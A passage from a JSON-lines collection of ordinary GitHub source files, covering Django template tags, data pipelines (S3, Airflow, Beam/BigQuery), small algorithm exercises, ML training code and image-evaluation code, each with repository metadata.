)\n\n handle_token = classmethod(handle_token)\n\n def __init__(self, obj_variable, debug):\n self.obj_variable = template.Variable(obj_variable)\n self.debug = debug\n\n def render(self, context):\n hit_count = get_hit_count_from_obj_variable(\n context,\n self.obj_variable,\n 'insert_hit_count_js'\n )\n template = self.JS_TEMPLATE_DEBUG if self.debug else self.JS_TEMPLATE\n return template % (str(reverse('hitcount:hit_ajax')), str(hit_count.pk))\n\n\ndef insert_hit_count_js(parser, token):\n \"\"\"\n Injects the JavaScript into your template that works with jquery.postcsrf.js.\n\n {% insert_hit_count_js_variables for [object] %}\n \"\"\"\n return WriteHitCountJavascript.handle_token(parser, token)\n\n\nregister.tag('insert_hit_count_js', insert_hit_count_js)\n","repo_name":"thornomad/django-hitcount","sub_path":"hitcount/templatetags/hitcount_tags.py","file_name":"hitcount_tags.py","file_ext":"py","file_size_in_byte":10280,"program_lang":"python","lang":"en","doc_type":"code","stars":449,"dataset":"github-code","pt":"35"} +{"seq_id":"34453757488","text":"import argparse\nimport json\nimport os\nimport shutil\nimport boto3\nimport numpy as np\nimport pandas as pd\n\nDATA_DIR = \"/opt/dkube/input\"\nconfig = json.load(open(os.path.join(DATA_DIR, \"config.json\")))\nwith open(os.path.join(DATA_DIR, \"credentials\"), \"r\") as f:\n creds = f.read()\naccess_key = creds.split(\"\\n\")[1].split(\"=\")[-1].strip()\nsecret_key = creds.split(\"\\n\")[2].split(\"=\")[-1].strip()\n\nsession = boto3.session.Session()\ns3_client = boto3.resource(\n service_name=\"s3\",\n aws_access_key_id=access_key,\n aws_secret_access_key=secret_key,\n endpoint_url=config[\"Endpoint\"],\n)\n\nmy_bucket = s3_client.Bucket(config[\"Bucket\"])\ns3_client.Bucket(config[\"Bucket\"]).download_file(\n \"CMU-1/Data0000.dat\", \"Data0000.dat\"\n)\n\nshutil.copy(\"Data0000.dat\", \"/output-dataset-tc\")\n","repo_name":"pallavipannu/pipelines","sub_path":"storageop-tc/download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24131926239","text":"from brownie import ApeSchool, accounts\n\ndef test_deploy():\n account = accounts[0]\n\n ape_school = ApeSchool.deploy({\n \"from\": account\n })\n ape_favourite_number = ape_school.getApeFavouriteNumber(\"Mary\")\n expected = 0\n \n assert ape_favourite_number == expected\n\ndef test_add_ape():\n account = accounts[0]\n ape_school = ApeSchool.deploy({\n \"from\": account\n })\n\n expected = 7\n # have to add from account\n transaction = ape_school.addApe(\"Mary\", 7, {\"from\": account})\n transaction.wait(1)\n\n assert ape_school.getApeFavouriteNumber(\"Mary\") == expected\n","repo_name":"ckt22/solidity-playground","sub_path":"brownie-playground/tests/test_ape_school.py","file_name":"test_ape_school.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35510521211","text":"from datetime import timedelta \n\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.utils.dates import days_ago\n\ndef hello_world():\n print(\"hello world!\")\n\n\ndef hello_airflow():\n print(\"hello airflow!\")\n\ndefault_args = {\n 'owner': 'airflow',\n 'start_date': days_ago(2),\n 'concurrency': 1,\n 'retries': 0\n}\n\ndag = DAG(\"first_dag\",\n default_args=default_args,\n schedule_interval=timedelta(days = 1)\n ) \n\n\nt1 = PythonOperator(task_id='hello_world',\n python_callable=hello_world,\n dag = dag)\n\nt2 = PythonOperator(task_id=\"hello_airflow\",\n python_callable=hello_airflow,\n dag = dag)\n\nt1 >> t2\n","repo_name":"pkmklong/airflow-review","sub_path":"airflow_home/pwd/dags/first_dag.py","file_name":"first_dag.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28248729142","text":"# Текстовый файл содержит только заглавные буквы латинского алфавита (ABC…Z). \n# Определите максимальное количество идущих подряд символов, среди которых не более одной буквы A.\n# https://inf-ege.sdamgia.ru/problem?id=38958\n\nf = open(\"38958.txt\", \"r\").read()\nmylist = []\nmaxx = 0\n\nfor i, j in enumerate(f):\n if j == \"A\":\n mylist.append(i)\n \nfor i in range(2, len(mylist)-1):\n maxx = max(maxx, mylist[i] - mylist[i-2] - 1)\n\nprint(maxx)\n","repo_name":"paracosm17/egeinformatics","sub_path":"24/38958/38958.py","file_name":"38958.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"71053572901","text":"from oncotator.utils.ConfigUtils import ConfigUtils\nfrom oncotator.utils.MutUtils import MutUtils\n\n\nclass FieldMapCreator(object):\n \"\"\"Generic class for creating a mapping of field name to an annotation name. Under the hood this is a simple dict.\n \"\"\"\n\n @staticmethod\n def choose_best_annotation(header, m, alternative_dict, deprioritize_input_annotations):\n \"\"\" Choose the best annotation in mut for the given header.\n :param header: header in the output. For example, a column in a TCGA MAF\n :param m: mutation -- for reference into available annotations\n :param alternative_dict: dict with mapping from column names to acceptable annotations.\n :param deprioritize_input_annotations: If an annotation has been sourced as \"INPUT\", whether we should try to\n choose another alias?\n :return: if no suitable annotation, None\n \"\"\"\n\n annotation_names = sorted(list(set(m.keys() + m.getAttributeNames())))\n hdr = header.lower()\n alternatives = alternative_dict.get(hdr, [])\n full_possibilities = [header] + alternatives\n result = None\n\n if not deprioritize_input_annotations:\n for p in full_possibilities:\n if p in annotation_names:\n result = p\n break\n else:\n second_choice = None\n for p in full_possibilities:\n if p in annotation_names and m.getAnnotation(p).getDatasource() != \"INPUT\":\n return p\n if second_choice is None and p in annotation_names:\n second_choice = p\n\n result = second_choice\n\n return result\n\n\n @staticmethod\n def create_field_map(headers, m, alternative_dict, is_render_internal_fields=True,\n exposed_fields=None, prepend=\"i_\", deprioritize_input_annotations=False,\n additional_columns=None):\n \"\"\"\n Create a mapping for output header to the best input annotation.\n\n This can handle prepend fields (attach the prepend to internal fields), exposed fields (ones not in the list of headers, but should not have a prepend),\n\n :param additional_columns: a list of additional columns not found in the mutation nor the headers. These will\n be considered internal fields with annotations of the exact same name.\n :type additional_columns list\n :param is_render_internal_fields: Whether annotations not assigned to headers (or superseded by other annotations) should be included in this map.\n :type is_render_internal_fields bool\n :param exposed_fields: list of fields that, if found, should never receive a prepend.\n :param prepend: The prepend to put on internal fields, if any are detected. If is_render_internal_fields is False, this parameter does nothing.\n :param deprioritize_input_annotations: If an annotation with the exact name of the header is found AND it has a datasource of \"INPUT\",\n use one the annotations instead. This is useful in cases where we want to reannotate. This effectively handles aliases.\n :param headers: List of headers that need to be populated for rendering. For example, the columns in a TCGA MAF\n :param m: MutationData to scrape available annotations\n :param alternative_dict: Dictionary of header to list of annotations. Usually, created from a config file.\n :return: dict of header:annotation name (one annotation name) that should be used for this output rendering.\n \"\"\"\n result = dict()\n if prepend is None:\n prepend = \"\"\n\n if exposed_fields is None:\n exposed_fields = set()\n\n # Process each header and find the first alias. If an annotation exists with the exact same name as the header\n # use that unless deprioritization is in effect.\n annotation_names = MutUtils.get_all_annotation_names(m)\n\n for h in headers:\n choice = FieldMapCreator.choose_best_annotation(h, m, alternative_dict, deprioritize_input_annotations)\n if choice is None:\n choice = h\n result[h] = choice\n\n # Now populate internal fields, if requested.\n if is_render_internal_fields:\n\n if additional_columns is None:\n additional_columns = []\n\n annotation_names_used = result.values()\n internal_field_dict = dict()\n sAnnotations = set(annotation_names)\n internal_fields = sAnnotations.difference(annotation_names_used)\n internal_fields = internal_fields.union(set(additional_columns))\n\n # Create a dict to do a lookup of annotation to the column to use.\n reverseAlternativeDict = ConfigUtils.buildReverseAlternativeDictionary(alternative_dict)\n\n for i in internal_fields:\n if i.startswith('_') or i == \"transcripts\":\n continue\n\n no_prepend_name = i\n if prepend != \"\" and i.startswith(prepend):\n no_prepend_name = i.replace(prepend, \"\")\n\n field_alt_dict = {i: [prepend+i, no_prepend_name]}\n choice = FieldMapCreator.choose_best_annotation(i, m, field_alt_dict, deprioritize_input_annotations)\n if choice is None:\n choice = i\n key_to_use = reverseAlternativeDict.get(i,i)\n if prepend.strip() == \"\" or i.startswith(prepend) or i in exposed_fields:\n internal_field_dict[key_to_use] = choice\n else:\n internal_field_dict[prepend + key_to_use] = choice\n\n result.update(internal_field_dict)\n\n return result\n","repo_name":"broadinstitute/oncotator","sub_path":"oncotator/utils/FieldMapCreator.py","file_name":"FieldMapCreator.py","file_ext":"py","file_size_in_byte":5794,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"35"} +{"seq_id":"31597136112","text":"from .provider_test import ProviderTest\nfrom gunpowder import *\nimport time\n\n\nclass DelayNode(BatchFilter):\n def __init__(self, time_prepare, time_process):\n self.time_prepare = time_prepare\n self.time_process = time_process\n\n def prepare(self, request):\n time.sleep(self.time_prepare)\n\n deps = request\n return deps\n\n def process(self, batch, request):\n time.sleep(self.time_process)\n\n\nclass TestProfiling(ProviderTest):\n def test_profiling(self):\n pipeline = (\n self.test_source\n + DelayNode(0.1, 0.2)\n + PrintProfilingStats(every=2)\n + DelayNode(0.2, 0.3)\n )\n\n with build(pipeline):\n for i in range(5):\n batch = pipeline.request_batch(self.test_request)\n\n profiling_stats = batch.profiling_stats\n\n summary = profiling_stats.get_timing_summary(\"DelayNode\", \"prepare\")\n\n # is the timing for each pass correct?\n self.assertGreaterEqual(summary.min(), 0.1)\n self.assertLessEqual(summary.min(), 0.2 + 0.1) # bit of tolerance\n\n summary = profiling_stats.get_timing_summary(\"DelayNode\", \"process\")\n\n self.assertGreaterEqual(summary.min(), 0.2)\n self.assertLessEqual(summary.min(), 0.3 + 0.1) # bit of tolerance\n\n # is the upstream time correct?\n self.assertGreaterEqual(\n profiling_stats.span_time(), 0.1 + 0.2 + 0.2 + 0.3\n ) # total time spend upstream\n self.assertLessEqual(\n profiling_stats.span_time(), 0.1 + 0.2 + 0.2 + 0.3 + 0.1\n ) # plus bit of tolerance\n","repo_name":"funkelab/gunpowder","sub_path":"tests/cases/profiling.py","file_name":"profiling.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"35"} +{"seq_id":"71836616742","text":"# General imports\nimport time\nimport apache_beam as beam\nfrom apache_beam.options.pipeline_options import PipelineOptions\nfrom apache_beam.io import WriteToBigQuery\nfrom apache_beam.runners import DirectRunner#, DataflowRunner\nfrom apache_beam.io.gcp.bigquery import bigquery_tools\nimport argparse\nimport logging\nimport json\nimport subprocess\n\n## Local imports\nfrom pipeline_trial.custom_fns import etl\nfrom pipeline_trial.custom_fns import utils\n\n# Define the pipeline\ndef run(argv=None, save_main_session=False):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--project',\n required=True,\n dest = 'project',\n help='The project id where magic happens.')\n parser.add_argument(\n '--bucket',\n required=True,\n dest = 'bucket',\n help='The bucket name where the files are stored.')\n parser.add_argument(\n '--parquetpath',\n required=True,\n dest = 'parquetpath',\n help='The file path for the new parquet files.')\n parser.add_argument(\n '--dataset',\n required=True,\n dest='dataset',\n help='The BigQuery dataset where data is gonna be stored.')\n parser.add_argument(\n '--table',\n required=True,\n dest='table',\n help='The BigQuery table to store the data.')\n \n args, beam_args = parser.parse_known_args(argv)\n\n try:\n # bq show --format=prettyjson PROJECT_ID:DATASET_NAME.TABLE_NAME > schema_downloaded.json\n subprocess.run([\"bq\", \"show\", \"--format=prettyjson\", f\"{args.project}:{args.dataset}.{args.table}\"], stdout=open(\"./schema_downloaded.json\", \"w\"))\n table_schema = bigquery_tools.parse_table_schema_from_json(json.dumps(json.load(open(\"./schema_downloaded.json\"))[\"schema\"]))\n except:\n table_schema = bigquery_tools.parse_table_schema_from_json(json.dumps(json.load(open(\"./schema_original.json\"))[\"schema\"]))\n\n beam_options = PipelineOptions(beam_args, save_main_session=save_main_session)\n\n full_file_path = args.bucket + '/'\n\n while True:\n new_files = utils.get_new_files(args.project, args.bucket, args.dataset, args.parquetpath)\n\n if len(new_files) == 0:\n print(f\"No new files found. Exiting pipeline\")\n break\n else:\n print('Total files founded: ' + str(len(new_files)))\n print('Starting pipeline...')\n for file_name in new_files:\n print(f\"Processing new file: {file_name}\")\n\n with beam.Pipeline(runner=DirectRunner(), options=beam_options) as p:\n (\n p\n | 'Reading the Parquetfile' >> beam.io.ReadFromParquetBatched(full_file_path + file_name, columns=['business_id', 'attributes'])\n | 'Converting to Pandas' >> beam.Map(lambda table: table.to_pandas())\n | 'Cleaning and transforming data' >> beam.FlatMap(etl.clean_attributes)\n | 'Uploading to BigQuery' >> WriteToBigQuery(\n table=args.table,\n dataset=args.dataset,\n project=args.project,\n schema=table_schema,\n create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,\n write_disposition=beam.io.BigQueryDisposition.WRITE_TRUNCATE,\n batch_size=int(100)\n )\n )\n\n print('Done processing file: ' + file_name)\n utils.update_processed_files(file_name, args.project, args.dataset)\n\n print(f'Done processing all files. Checking for new files and exiting if no new files are founded')\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.WARNING)\n run()","repo_name":"maicobernal/dataflow","sub_path":"pipeline_trial/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73320756582","text":"from typing import List\n\n\nclass Solution:\n def solve(self, board: List[List[str]]) -> None:\n \"\"\"\n Do not return anything, modify board in-place instead.\n \"\"\"\n total_rows, total_cols = len(board), len(board[0])\n directions = [(-1, 0), (1, 0), (0, -1), (0, 1)]\n visited = set()\n\n def depth_first_search(x, y):\n\n for dx, dy in directions:\n position_x, position_y = x+dx, y+dy\n\n if 0 <= position_x < total_rows and 0 <= position_y < total_cols and board[position_x][position_y] == \"O\" and (position_x, position_y) not in visited:\n visited.add((position_x, position_y))\n board[position_x][position_y] = \"#\"\n depth_first_search(position_x, position_y)\n\n for x in range(total_rows):\n for y in range(total_cols):\n if (x == 0 or x == total_rows-1 or y == 0 or y == total_cols-1) and board[x][y] == \"O\" and (x, y) not in visited:\n visited.add((x, y))\n board[x][y] = \"#\"\n depth_first_search(x, y)\n\n for x in range(total_rows):\n for y in range(total_cols):\n if board[x][y] == \"O\":\n board[x][y] = \"X\"\n elif board[x][y] == \"#\":\n board[x][y] = \"O\"\n\n\nif __name__ == \"__main__\":\n ex = Solution()\n board = [[\"X\", \"X\", \"X\", \"X\"], [\"X\", \"O\", \"O\", \"X\"],\n [\"X\", \"X\", \"O\", \"X\"], [\"X\", \"O\", \"X\", \"X\"]]\n ex.solve(board)\n sol = [[\"X\", \"X\", \"X\", \"X\"], [\"X\", \"X\", \"X\", \"X\"],\n [\"X\", \"X\", \"X\", \"X\"], [\"X\", \"O\", \"X\", \"X\"]]\n for board_elem, sol_elem in zip(board, sol):\n assert board_elem == sol_elem\n\n board = [[\"O\", \"X\", \"X\", \"O\", \"X\"], [\"X\", \"O\", \"O\", \"X\", \"O\"], [\n \"X\", \"O\", \"X\", \"O\", \"X\"], [\"O\", \"X\", \"O\", \"O\", \"O\"], [\"X\", \"X\", \"O\", \"X\", \"O\"]]\n ex.solve(board)\n sol = [[\"O\", \"X\", \"X\", \"O\", \"X\"], [\"X\", \"X\", \"X\", \"X\", \"O\"], [\n \"X\", \"X\", \"X\", \"O\", \"X\"], [\"O\", \"X\", \"O\", \"O\", \"O\"], [\"X\", \"X\", \"O\", \"X\", \"O\"]]\n\n for board_elem, sol_elem in zip(board, sol):\n assert board_elem == sol_elem\n","repo_name":"gbrunofranco/leetcode","sub_path":"Python/130.py","file_name":"130.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"11946167024","text":"r = []\nfor _ in range(2*int(input())):\n line = input()\n if not line:\n continue\n for c in (\"(\", \")\", \"+\", \"-\", \"*\"):\n line = line.replace(c, \"\")\n line = line.lstrip(\"0\")\n if not line:\n r.append(\"0\")\n else:\n r.append(line)\nprint(\"\\n\".join(r))\n","repo_name":"bradyz/sandbox","sub_path":"challenges/ipsc/g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"8486073742","text":"import os\nimport numpy as np\nfrom glob import glob\n\nimport torch.optim as optim\nimport torch\n\nfrom model import IQN\n\nfrom torch.utils.tensorboard import SummaryWriter\n\n\nclass Trainer:\n def __init__(self, args, text_vectors, vocab_size, train_dl):\n\n self.log_path = os.path.join('.', 'logs',\n str(args.num_quantile) + '_' + str(args.gamma))\n self.summary_path = os.path.join(self.log_path, 'summary')\n\n if not os.path.exists(self.summary_path):\n os.makedirs(self.summary_path)\n\n self.writer = SummaryWriter(log_dir=self.summary_path)\n\n self.train_dl = train_dl\n\n self.target_update_freq = args.target_update_freq\n self.evaluation_freq = args.evaluation_freq\n self.network_save_freq = args.network_save_freq\n\n self.device = args.device\n self.gamma = args.gamma\n self.num_actions = args.num_actions\n\n # quantile\n self.num_quantile = args.num_quantile\n\n self.epochs = 0\n self.epoch_loss = 0\n self.epi_rewards = 0\n\n # vocab_size = len(TEXT.vocab.freqs)\n self.model = IQN(text_vectors, vocab_size, args.embedding_dim, args.n_filters,\n args.filter_sizes, args.pad_idx,\n n_actions=args.num_actions,\n n_quant=self.num_quantile,\n rnn=args.rnn).to(args.device)\n self.target_model = IQN(text_vectors, vocab_size, args.embedding_dim, args.n_filters,\n args.filter_sizes, args.pad_idx,\n n_actions=args.num_actions,\n n_quant=self.num_quantile,\n rnn=args.rnn).to(args.device)\n\n self.target_model.load_state_dict(self.model.state_dict())\n\n self.optimizer = optim.Adam(self.model.parameters(), lr=args.learning_rate)\n self.scheduler = optim.lr_scheduler.CosineAnnealingLR(self.optimizer, 1000)\n\n def run(self):\n while True:\n self.epoch_loss = 0\n self.epochs += 1 \n self.model.train()\n\n self.scheduler.step()\n if self.epochs % 10 == 0:\n print(self.scheduler.get_lr()[0])\n\n self.train_episode()\n\n # update target_model\n if self.epochs % self.target_update_freq == 0:\n self.target_model.load_state_dict(self.model.state_dict())\n\n if self.epochs % self.evaluation_freq == 0:\n self.model.eval()\n self.evaluation(self.train_dl)\n\n if self.epochs % self.network_save_freq == 0:\n self.save_model()\n\n self.log()\n\n def train_episode(self):\n for batch in self.train_dl:\n states = batch['State'].to(self.device)\n next_states = batch['Next_State'].to(self.device)\n rewards = torch.round(batch['Reward'].to(self.device))\n\n self.train(states, next_states, rewards)\n\n def train(self, states, next_states, rewards):\n curr_q, tau, _ = self.model(states)\n # curr_q = curr_q.repeat(1, 1, self.num_quantile)\n\n # target_q\n with torch.no_grad():\n if self.gamma == 0.0:\n target_q = rewards.reshape(-1, 1)\n target_q = target_q.repeat(1, self.num_quantile)\n else:\n next_q, _, _ = self.target_model(next_states)\n next_q = next_q.squeeze(2)\n\n target_q = rewards.reshape(-1, 1) + self.gamma * next_q\n target_q = target_q.unsqueeze(1)\n # target_q = target_q.unsqueeze(2)\n # target_q = target_q.repeat(1, 1, self.num_quantile)\n # target_q = target_q.permute(0, 2, 1)\n\n # (BATCH, N_QUANT, N_QUANT)\n tau = tau.repeat(1, 1, self.num_quantile)\n\n diff = target_q - curr_q\n\n loss = self.huber(diff)\n\n I_delta = (diff<0).double()\n loss *= torch.abs(tau - I_delta).detach()\n\n # huber loss\n loss = torch.mean(torch.sum(torch.mean(loss, dim=2), dim=1))\n\n # Optimize the model\n self.optimizer.zero_grad()\n loss.backward()\n # for param in self.model.parameters():\n # param.grad.data.clamp_(-1, 1)\n self.optimizer.step()\n\n self.epoch_loss += loss.item()\n\n def evaluation(self, dl):\n epi_rewards = 0\n dist_hist = []\n rewards_hist = []\n\n for batch in dl:\n states = batch['State'].to(self.device)\n rewards = batch['Reward'].to(self.device)\n\n with torch.no_grad():\n dist, _, _ = self.model(states)\n dist = dist.squeeze(2)\n dist_hist.append(dist.cpu().detach().numpy())\n rewards_hist.append(rewards.cpu().detach().numpy())\n # print(dist.shape)\n _mean = dist.sum(dim=1)\n actions = torch.where(\n _mean > 0,\n torch.LongTensor([1]).to(self.device),\n torch.LongTensor([0]).to(self.device))\n # print(actions.shape, ' ', rewards.shape)\n epi_rewards += (actions * rewards).detach().cpu().numpy().sum()\n\n self.epi_rewards = epi_rewards\n\n print(' '*20,\n 'train_reward: ', epi_rewards)\n \n return dist_hist, rewards_hist\n\n def huber(self, x):\n cond = (x.abs() < 1.0).float().detach()\n return 0.5 * x.pow(2) * cond + (x.abs() - 0.5) * (1.0 - cond)\n\n def log(self):\n print('epoch: ', self.epochs,\n ' loss: {:.3f}'.format(self.epoch_loss))\n\n self.writer.add_scalar(\"loss\", self.epoch_loss, self.epochs)\n self.writer.add_scalar(\"epi_rewards\", self.epi_rewards, self.epochs)\n\n def save_model(self):\n torch.save(self.model.state_dict(), os.path.join(self.log_path, str(self.epochs))+'.pt')\n\n def load_model(self):\n model_path = sorted(glob(os.path.join(self.log_path, '*.pt')))[-1]\n self.model.load_state_dict(torch.load(model_path))\n\n def __del__(self):\n self.writer.close()\n","repo_name":"ShogoAkiyama/rltorch2","sub_path":"sentiment/iqn/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":6160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"2141453307","text":"import inspect\nimport logging\n\nclass BaseClass:\n def getLogger(self):\n\n loggerName = inspect.stack()[1][3]#improvement to properly display test_ methods in logs when using this method as inherited.\n logger = logging.getLogger(loggerName) # __name__ catches test case name\n\n fileHandler = logging.FileHandler(\"logs.txt\") # describe file which is used for logs\n # format of logs\n format = logging.Formatter(\n \"%(asctime)s: %(levelname)s: %(name)s: %(message)s\") # example of tutor ;s is treating like a string\n\n fileHandler.setFormatter(format) # adding format to file object\n logger.addHandler(fileHandler) # to attach logs to file, requires usage of fileHandler object\n\n logger.setLevel(\n logging.INFO) # define the level of logs needed (selected is used, and below it f.e. warning = warning,error,critical\n return logger #method will return logger (logging object)","repo_name":"sashapush/python_QA","sub_path":"Pytest/BaseClass.py","file_name":"BaseClass.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41969074137","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport os\nimport random\n\nimport click\nimport numpy as np\nfrom sklearn.metrics import jaccard_similarity_score, precision_score,\\\n recall_score, f1_score, pairwise\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom torchvision.datasets.folder import default_loader, has_file_allowed_extension\nimport torchvision.transforms as transforms\nfrom tqdm import tqdm\n\nfrom geneva.models.object_localizer import Inception3ObjectLocalizer\n\n\nloaded_model = None\nIMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']\n\n\nclass ImageFolderNonGT(torch.utils.data.Dataset):\n \"\"\"\n Code from https://github.com/pytorch/vision/blob/f566fac80e3182a8b3c0219a88ae00ed1b81d7c7/torchvision/datasets/folder.py\n License:\n BSD 3-Clause License\n\n Copyright (c) Soumith Chintala 2016,\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\n * Neither the name of the copyright holder nor the names of its\n contributors may be used to endorse or promote products derived from\n this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n \"\"\"\n def __init__(self, root, transform=None, labelfile=None):\n self.root = root\n self.transform = transform\n\n generated_dirs = sorted([d.name for d in os.scandir(self.root) if d.is_dir() and not d.name.endswith('_gt')])\n gt_dirs = sorted([d.name for d in os.scandir(self.root) if d.is_dir() and d.name.endswith('_gt')])\n\n assert len(gt_dirs) == len(generated_dirs)\n\n gt_files = []\n generated_files = []\n for i in range(len(gt_dirs)):\n gt_files.extend([os.path.join(gt_dirs[i], x) for x in os.listdir(os.path.join(self.root, gt_dirs[i]))])\n generated_files.extend([os.path.join(generated_dirs[i], x)\n for x in os.listdir(os.path.join(self.root, generated_dirs[i]))])\n\n gt_imgs = [x for x in gt_files if has_file_allowed_extension(x, IMG_EXTENSIONS)]\n generated_imgs = [x for x in generated_files if has_file_allowed_extension(x, IMG_EXTENSIONS)]\n self.gt_filenames = gt_imgs\n self.generated_filenames = generated_imgs\n\n assert len(self.gt_filenames) == len(self.generated_filenames)\n\n if len(self.gt_filenames) == 0:\n raise(RuntimeError(\"Found 0 files in folder: \" + root + \"\\n\"\n \"Supported extensions are: \" + \",\".join(IMG_EXTENSIONS)))\n\n self.loader = default_loader\n\n def __getitem__(self, idx):\n gt_path = self.gt_filenames[idx]\n generated_path = self.generated_filenames[idx]\n gt_sample = self.loader(os.path.join(self.root, gt_path))\n generated_sample = self.loader(os.path.join(self.root, generated_path))\n if transforms is not None:\n generated_sample = self.transform(generated_sample)\n gt_sample = self.transform(gt_sample)\n\n return generated_sample, gt_sample\n\n def __len__(self):\n return len(self.gt_filenames)\n\n def __repr__(self):\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Root Location: {}\\n'.format(self.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return fmt_str\n\n\ndef setup_inception_model(num_classes, pretrained=False):\n if num_classes == 24:\n num_coords = 2\n else:\n num_coords = 3\n model = torch.nn.DataParallel(Inception3ObjectLocalizer(num_objects=num_classes,\n pretrained=pretrained,\n num_coords=num_coords)).cuda()\n return model\n\n\ndef construct_graph(coords, dataset):\n n = len(coords)\n graph = np.zeros((2, n, n))\n for i in range(n):\n if coords.shape[1] == 2:\n ref_x, ref_y = coords[i]\n else:\n ref_x, _, ref_y = coords[i]\n for j in range(n):\n if i == j:\n query_x, query_y = 0.5, 0.5\n else:\n if coords.shape[1] == 2:\n query_x, query_y = coords[j]\n else:\n query_x, _, query_y = coords[j]\n\n if ref_x > query_x:\n graph[0, i, j] = 1\n elif ref_x < query_x:\n graph[0, i, j] = -1\n\n if ref_y > query_y:\n graph[1, i, j] = 1\n elif ref_y < query_y:\n graph[1, i, j] = -1\n\n return graph\n\n\ndef get_graph_similarity(detections, label, locations, gt_locations, dataset):\n \"\"\"Computes the accuracy of relationships of the intersected\n detections multiplied by recall\n \"\"\"\n intersection = (detections & label).astype(bool)\n if not np.any(intersection):\n return 0\n\n locations = locations.data.cpu().numpy()[intersection]\n gt_locations = gt_locations.data.cpu().numpy()[intersection]\n\n genereated_graph = construct_graph(locations, dataset)\n gt_graph = construct_graph(gt_locations, dataset)\n\n matches = (genereated_graph == gt_graph).astype(int).flatten()\n matches_accuracy = matches.sum() / len(matches)\n recall = recall_score(label, detections, average='samples')\n\n graph_similarity = recall * matches_accuracy\n\n return graph_similarity\n\n\ndef get_obj_det_acc(dataloader, dataset):\n jss = []\n cs = []\n graph_similarity = []\n\n gt_all = []\n pred_all = []\n\n for _, (sample, gt) in enumerate(tqdm(dataloader)):\n sample = sample.cuda()\n gt = gt.cuda()\n detection_logits, locations = loaded_model(sample)\n gt_detection_logits, gt_locations = loaded_model(gt)\n\n pred = detection_logits > 0.5\n gt_pred = gt_detection_logits > 0.5\n\n pred = pred.cpu().numpy().astype('int')\n gt_pred = gt_pred.cpu().numpy().astype('int')\n gt_detection_logits = gt_detection_logits.cpu().numpy()\n detection_logits = detection_logits.cpu().numpy()\n\n gt_all.extend(gt_pred)\n pred_all.extend(pred)\n\n cs.append(pairwise.cosine_similarity(gt_detection_logits, detection_logits)[0][0])\n graph_similarity.append(get_graph_similarity(pred, gt_pred, locations, gt_locations, dataset))\n jss.append(jaccard_similarity_score(gt_pred, pred))\n\n ps = precision_score(np.array(gt_all), np.array(pred_all), average='samples')\n rs = recall_score(np.array(gt_all), np.array(pred_all), average='samples')\n f1 = f1_score(np.array(gt_all), np.array(pred_all), average='samples')\n\n return np.mean(jss), ps, rs, f1, np.mean(cs), np.mean(graph_similarity)\n\n\ndef _init_inception(model_dir):\n global loaded_model\n\n checkpoint = torch.load(model_dir)\n random.seed(1234)\n torch.manual_seed(1234)\n if checkpoint['cuda_enabled']:\n cudnn.deterministic = True\n loaded_model = 